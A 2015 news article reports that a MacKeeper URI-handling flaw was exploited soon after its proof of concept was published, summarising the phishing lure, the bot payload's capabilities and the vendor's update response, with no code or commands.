Observed attack adds malware that can execute shell commands

Jun 6, 2015 09:43 GMT  ·  By

The security flaw disclosed for MacKeeper last month was quickly taken advantage of by cybercriminals, especially when they had the proof-of-concept (PoC) code to start from.

Discovered and reported by security researcher Braden Thomas, the flaw consisted in improper handling of its custom URI schemes, which could lead to various unwanted actions like uninstalling programs or downloading malware.

The trouble was caused by insufficient validation of the commands executed by MacKeeper using its custom links, and if authentication already occurred, an attacker sending a malicious link to the victim could run commands on the machine with root privileges.

After PoC was published, crooks wasted no time initiating attacks

The developer released an update to version 3.4.1, which eliminates the risk. Although there is no estimation of the number of users impacted, it is likely to be high, as MacKeeper advertised over 20 million installations as of March 24.

On the same note, cybercriminals started exploiting the flaw in the wild about two days after the PoC was disclosed to the public, says Sergei Shevchenko, cyber researcher at BAE Systems. A period this short may not have been sufficient for users to apply the update.

Shevchenko analyzed an attack, which was carried out by delivering the victim an email with a malicious link. When the URL was launched, a notification from MacKeeper popped up informing that the computer was infected with malware and asking for the password to clean it up. This would actually allow the malware to be executed with administrator privileges.

No need for targeted attacks, MacKeeper is popular enough

In the attack observed by the researcher, the payload dropped on the computer was a bot that allowed remote access.

Its functionality included executing shell commands, exfiltrating data, downloading files from a command and control (C&C) server as well as executing them.

During the analysis, the researcher found that the malware makes a check for Internet connectivity by accessing the Google search page. If it does not load, it continues to check until the machine is online.

Shevchenko said that, considering the high number of downloads MacKeeper has, cybercriminals can send emails at random and have a good chance of hitting someone with the program installed.

[UPDATE]: Shortly after publishing this article, MacKeeper contacted us and pointed to a blog post from the company saying that almost all users of the product have received the latest update.

"There is a small percentage of users who are not active, have not launched the application, or they are offline," the company said, adding that the efforts to fix, update and inform users of the risk paid off and it is believed that there is no "population of MacKeeper users who currently are at risk."

On Friday, the company said that it had no information about  specific cases of malware targeting MacKeeper users.